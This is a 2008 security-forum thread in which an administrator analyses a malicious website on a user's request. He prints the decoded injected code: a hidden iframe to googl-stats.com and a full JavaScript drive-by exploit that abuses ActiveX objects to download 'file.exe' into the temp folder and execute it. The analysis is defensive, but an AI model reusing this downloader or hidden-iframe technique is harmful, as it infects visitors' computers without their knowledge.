Author Topic: truecreditcorporate.org  (Read 3839 times)

0 Members and 1 Guest are viewing this topic.

November 15, 2008, 11:13:17 pm
Read 3839 times

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Was wondering if someone could check this for me. Getting the following alert:
Code: [Select]
'http://www.truecreditcorporate.org/'
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: 'http://www.truecreditcorporate.org/'
Information: Contains HEUR/HTML.Malware suspicious code
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.29, VDF 7.1.0.55

I also use Finjan Secure Browsing Plug-in, alerts from it as well.
The requested URL was blocked due to the following reason:
Malicious Behavior Detected! The page or file you requested contains malicious code.

November 15, 2008, 11:36:28 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ref: http://vurl.mysteryfcm.co.uk/?url=141195

Contains a script that decodes to;

Code: [Select]
<iframe src="http://googl-stats.com/xmlfeed/feed.xmi?SMCe" style="display:none"></iframe>
This claims to be a 500 Internal Server error;

http://vurl.mysteryfcm.co.uk/?url=141196

... but has a script at the very bottom of the page;

Code: [Select]
<script type="text/javascript" src="?aa381f57ec228a9304da2b0a24e6c4b8n76697700n534d4365000000000000"></script>
http://vurl.mysteryfcm.co.uk/?url=141197

This loads another escaped script, that decodes to;

Code: [Select]
function CreateO(o,n)
 {
   var r=null;
   try
   {
     r=o.CreateObject(n)
   }
   catch(e)
   {
   }
   if(!r)
   {
     try
     {
       r=o.CreateObject(n,"")
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.CreateObject(n,"","")
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.GetObject("",n)
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.GetObject(n,"")
     }
     catch(e)
     {
     }
   }
   if(!r)
   {
     try
     {
       r=o.GetObject(n)
     }
     catch(e)
     {
     }
   }
   return(r);
 }
 function Go(a)
 {
   fname="file.exe";
   var exeurl=document.location+"?5";
   var fso=a.CreateObject("Scripting.FileSystemobject","");
   var sap=CreateO(a,"Shell.Application");
   var x=CreateO(a,"ADODB.Stream");
   var nl=null;
   fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
   x.Mode=3;
   try
   {
     nl=CreateO(a,"Micr"+"osoft.XML"+"HTTP");
     nl.open("GET",exeurl,false);
   }
   catch(e)
   {
     try
     {
       nl=CreateO(a,"MSXML.XMLHTTP");
       nl.open("GET",exeurl,false);
     }
     catch(e)
     {
       try
       {
         nl=CreateO(a,"MSXML.ServerXMLHTTP");
         nl.open("GET",exeurl,false);
       }
       catch(e)
       {
         try
         {
           nl=new XMLHttpRequest();
           nl.open("GET",exeurl,false);
         }
         catch(e)
         {
           return 0;
         }
       }
     }
   }
   x.Type=1;
   nl.send(null);
   rb=nl.responseBody;
   x.Open();
   x.Write(rb);
   x.SaveTofile(fname,2);
   sap.ShellExecute(fname);
   return 1;
 }
 function mdac()
 {
   var i=0;
   var target=new Array("B496C556-6513-11D0-983A-00C04FC21E36","B4963556-65A3-11D0-983A500C04FC29E30","1B9BCEDD-E37E547E1-1322-D4A210617116","0006F033-000050000-C000-000000000046","0006F031-0000-000053000-000000000046","6532070a-7664-45e6-0793-dc1f111d2fc3","64145122-B178-451D-A048-FCFDF33E033C","7F5B7F63-606F-433150A265331E03C01E3D","06723E09-F4C2-43c8-0358-09FCD1DB0766","6396725F-1B2D-4831-A9FD5874847682010","BA018599-1DB3-44f9-83B45461454C842F8","D0C07D56-7C69-43F1-B4A0-25F5A116AB19","E8C3CDDF-C120-496b-205056C07C962476B",null);
   while(target[i])
   {
     var a=null;
     a=document.createElement("7bje3t");
     a.setAttribute("classid","c4sid"+unescape('53A')+target[i]);
     if(a)
     {
       try
       {
         var b=CreateO(a,"S0ell.Ap0lica4ion");
         if(b)
         {
           if(Go(a))return 1;
         }
       }
       catch(e)
       {
       }
     }
     i++;
   }
 }
 mdac();
 

Which seems to download the following (though that wasn't there when I tried);

http://googl-stats.com/xmlfeed/file.exe
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

November 15, 2008, 11:42:27 pm
Reply #2

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Thank you for the help. Not to change the topic a bunch, but miss your forum.

November 15, 2008, 11:47:55 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net